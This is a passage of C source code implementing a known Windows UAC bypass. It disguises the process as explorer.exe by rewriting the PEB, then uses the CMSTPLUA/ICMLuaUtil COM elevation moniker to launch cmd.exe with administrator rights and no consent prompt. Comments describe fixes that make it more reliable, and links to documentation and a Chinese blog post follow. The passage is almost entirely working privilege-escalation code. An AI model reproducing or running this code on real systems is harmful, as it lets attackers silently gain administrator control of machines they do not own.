        /* FastPebLock guards the ProcessParameters update only; the loader
         * list walk below runs outside it (LdrEnumerateLoadedModules is
         * presumably serialised by the loader lock itself -- confirm). */
        RtlEnterCriticalSection(Peb->FastPebLock);

        /* RtlInitUnicodeString is expected to store a pointer to
         * g_lpszExplorer2 rather than copy it, hence the file-scope string. */
        RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, g_lpszExplorer2);
        RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, g_lpszExplorer2);

        RtlLeaveCriticalSection(Peb->FastPebLock);

        LdrEnumerateLoadedModules(0, &supxLdrEnumModulesCallback, (PVOID)Peb);
    }
}
/*
 * Build an "Elevation:Administrator!new:{CLSID}" moniker for rclsid and ask
 * CoGetObject to bind it, returning the requested interface in *ppv.
 *
 * hwnd   - owner window stored in BIND_OPTS3.hwnd (may be NULL).
 * rclsid - class to activate; serialised with StringFromGUID2.
 * riid   - interface to return.
 * ppv    - receives the interface pointer on success.
 *
 * Returns the HRESULT of StringCchPrintfW when the moniker does not fit,
 * otherwise whatever CoGetObject returns. Unlike the earlier listing, this
 * variant calls CoInitialize itself; its HRESULT is not examined and nothing
 * in this file pairs it with CoUninitialize (main's call is commented out).
 */
HRESULT CoCreateInstanceAsAdmin(HWND hwnd, REFCLSID rclsid, REFIID riid, __out void** ppv)
{
    WCHAR clsidText[50];
    WCHAR moniker[300];

    CoInitialize(NULL);

    /* "{xxxxxxxx-xxxx-...}" text form of the CLSID. */
    StringFromGUID2(rclsid, clsidText, sizeof clsidText / sizeof clsidText[0]);

    HRESULT hr = StringCchPrintfW(moniker,
                                  sizeof moniker / sizeof moniker[0],
                                  L"Elevation:Administrator!new:%s",
                                  clsidText);
    if (FAILED(hr)) {
        return hr;
    }

    /* Only the size, owner window and out-of-process context are set;
     * every other bind option stays zero. */
    BIND_OPTS3 opts;
    memset(&opts, 0, sizeof opts);
    opts.cbStruct = sizeof opts;
    opts.hwnd = hwnd;
    opts.dwClassContext = CLSCTX_LOCAL_SERVER;

    return CoGetObject(moniker, &opts, riid, ppv);
}
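/*
 * Activate the CMSTPLUA class through the elevation moniker and call
 * ICMLuaUtil::ShellExec on it with lpwszExecutable.
 *
 * lpwszExecutable - program to launch; passed to ShellExec unchanged.
 *
 * Returns TRUE only when the activation and ShellExec both report success.
 * Fixes relative to the original: the activation HRESULT was ignored, so a
 * failed activation left CMLuaUtil NULL and the ShellExec call dereferenced
 * it; and success was judged by GetLastError(), which COM calls do not set --
 * the HRESULTs are examined instead. COM is initialised inside
 * CoCreateInstanceAsAdmin in this listing.
 */
BOOL CMLuaUtilBypassUAC(LPWSTR lpwszExecutable)
{
    CLSID clsidICMLuaUtil = { 0 };
    IID iidICMLuaUtil = { 0 };
    ICMLuaUtil* CMLuaUtil = NULL;

    if (lpwszExecutable == NULL) {
        return FALSE;
    }

    /* CLSID_CMSTPLUA / IID_ICMLuaUtil are string forms, presumably defined in
     * BypassUAC.h; a malformed string makes either conversion fail. */
    if (FAILED(CLSIDFromString(CLSID_CMSTPLUA, &clsidICMLuaUtil)) ||
        FAILED(IIDFromString(IID_ICMLuaUtil, &iidICMLuaUtil))) {
        return FALSE;
    }

    /* On failure CMLuaUtil stays NULL, so both conditions are checked. */
    HRESULT hr = CoCreateInstanceAsAdmin(NULL, clsidICMLuaUtil, iidICMLuaUtil, (PVOID*)(&CMLuaUtil));
    if (FAILED(hr) || CMLuaUtil == NULL) {
        return FALSE;
    }

    hr = CMLuaUtil->lpVtbl->ShellExec(CMLuaUtil, lpwszExecutable, NULL, NULL, 0, SW_SHOW);

    CMLuaUtil->lpVtbl->Release(CMLuaUtil);

    return SUCCEEDED(hr) ? TRUE : FALSE;
}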
/*
int main() {
CoInitialize(NULL);

CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");
CoUninitialize();
return 0;
}*/
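/*
 * Entry point: resolve the ntdll routines the masquerade needs, rewrite the
 * process identity, then run the elevated ShellExec demonstration.
 *
 * Returns 0 on completion, 1 when ntdll cannot be located or any of the five
 * exports is missing. The original declared main as VOID and assigned the
 * GetProcAddress results without checking them, so a missing export would
 * have been called through NULL inside supMasqueradeProcess. CoInitialize
 * happens inside CoCreateInstanceAsAdmin; as in the original, no
 * CoUninitialize is issued here.
 */
int main(void)
{
    HMODULE ntdll = GetModuleHandleA("ntdll.dll");
    if (ntdll == NULL) {
        return 1;
    }

    NtAllocateVirtualMemory = (LPNTALLOCATEVIRTUALMEMORY)GetProcAddress(ntdll, "NtAllocateVirtualMemory");
    RtlEnterCriticalSection = (LPRTLENTERCRITICALSECTION)GetProcAddress(ntdll, "RtlEnterCriticalSection");
    RtlInitUnicodeString = (LPRTLINITUNICODESTRING)GetProcAddress(ntdll, "RtlInitUnicodeString");
    RtlLeaveCriticalSection = (LPRTLLEAVECRITICALSECTION)GetProcAddress(ntdll, "RtlLeaveCriticalSection");
    LdrEnumerateLoadedModules = (LPLDRENUMERATELOADEDMODULES)GetProcAddress(ntdll, "LdrEnumerateLoadedModules");

    /* supMasqueradeProcess calls through every one of these unconditionally. */
    if (NtAllocateVirtualMemory == NULL || RtlEnterCriticalSection == NULL ||
        RtlInitUnicodeString == NULL || RtlLeaveCriticalSection == NULL ||
        LdrEnumerateLoadedModules == NULL) {
        return 1;
    }

    supMasqueradeProcess();
    CMLuaUtilBypassUAC((LPWSTR)L"c:\\windows\\system32\\cmd.exe");
    //CoUninitialize();

    return 0;
}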

LINKS

COM 提升名字对象 - Win32 apps
docsmsft
基于COM组件接口ICMLuaUtil的BypassUAC - 自己的小白 - 博客园